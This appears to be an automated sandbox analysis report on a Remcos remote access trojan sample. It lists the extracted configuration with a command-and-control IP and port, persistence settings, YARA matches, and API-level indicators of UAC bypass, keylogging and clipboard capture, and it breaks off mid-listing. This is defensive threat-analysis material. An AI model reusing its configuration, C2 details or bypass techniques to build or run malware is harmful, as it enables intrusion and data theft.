Malware Configuration Extractor: Remcos {"Host:Port:Password": "198.23.227.212:32583:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0ZPVF8", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: 198.23.227.212

Virustotal: Detection: 14%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\yavascript.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Virustotal: Detection: 47%			Perma Link

Multi AV Scanner detection for submitted file

Source: ltlbVjClX9.exe	ReversingLabs: Detection: 76%
Source: ltlbVjClX9.exe	Virustotal: Detection: 47%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2513171339.000000000086C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463964388.000000000061C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409616641.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474688472.0000000000598000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ltlbVjClX9.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 6772, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ltlbVjClX9.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	0_2_00433837
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02163A9E CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	0_2_02163A9E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	15_2_00433837
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00763A9E CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	15_2_00763A9E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	20_2_00433837
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FB3A9E CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	20_2_01FB3A9E

Source: ltlbVjClX9.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ltlbVjClX9.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 6772, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004074FD _wcslen,CoGetObject,	0_2_004074FD
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004074FD _wcslen,CoGetObject,	15_2_004074FD
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004074FD _wcslen,CoGetObject,	20_2_004074FD

Source: ltlbVjClX9.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_00409253
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_0041C291
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_0040C34D
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_00409665
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0044E879 FindFirstFileExA,	0_2_0044E879
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	0_2_0040880C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040783C FindFirstFileW,FindNextFileW,	0_2_0040783C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00419AF5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0040BB30
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_0040BD37
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214C4F8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_0214C4F8
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0213C5B4 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_0213C5B4
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02138A73 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	0_2_02138A73
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02137AA3 FindFirstFileW,FindNextFileW,	0_2_02137AA3
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0217EAE0 FindFirstFileExA,	0_2_0217EAE0
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_021398CC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_021398CC
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02149D5C FindFirstFileW,	0_2_02149D5C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0213BD97 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0213BD97
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409253
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0041C291
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0040C34D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409665
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0044E879 FindFirstFileExA,	15_2_0044E879
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_0040880C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040783C FindFirstFileW,FindNextFileW,	15_2_0040783C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00419AF5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040BD37
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074C4F8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0074C4F8
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0073C5B4 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0073C5B4
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_007398CC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_007398CC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00738A73 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_00738A73
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0077EAE0 FindFirstFileExA,	15_2_0077EAE0
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00737AA3 FindFirstFileW,FindNextFileW,	15_2_00737AA3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00749D5C FindFirstFileW,	15_2_00749D5C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0073BD97 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0073BD97
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	20_2_00409253
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	20_2_0041C291
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	20_2_0040C34D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	20_2_00409665
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0044E879 FindFirstFileExA,	20_2_0044E879
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	20_2_0040880C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040783C FindFirstFileW,FindNextFileW,	20_2_0040783C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	20_2_00419AF5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	20_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	20_2_0040BD37
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F8C5B4 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	20_2_01F8C5B4
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9C4F8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	20_2_01F9C4F8
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F898CC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	20_2_01F898CC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FCEAE0 FindFirstFileExA,	20_2_01FCEAE0
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F87AA3 FindFirstFileW,FindNextFileW,	20_2_01F87AA3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F88A73 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	20_2_01F88A73
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F8BD97 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	20_2_01F8BD97
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F99D5C FindFirstFileW,	20_2_01F99D5C

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

0_2_00407C97

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 198.23.227.212

Source: global traffic

TCP traffic: 192.168.2.5:49714 -> 198.23.227.212:32583

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.227.212

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_0041B380

Source: yavascript.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: ltlbVjClX9.exe, 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, ltlbVjClX9.exe, 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, ltlbVjClX9.exe, 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

0_2_0040A2B8

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

0_2_0040B70E

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,	0_2_004168C1
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,	15_2_004168C1
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,	20_2_004168C1

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

0_2_0040B70E

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

0_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE
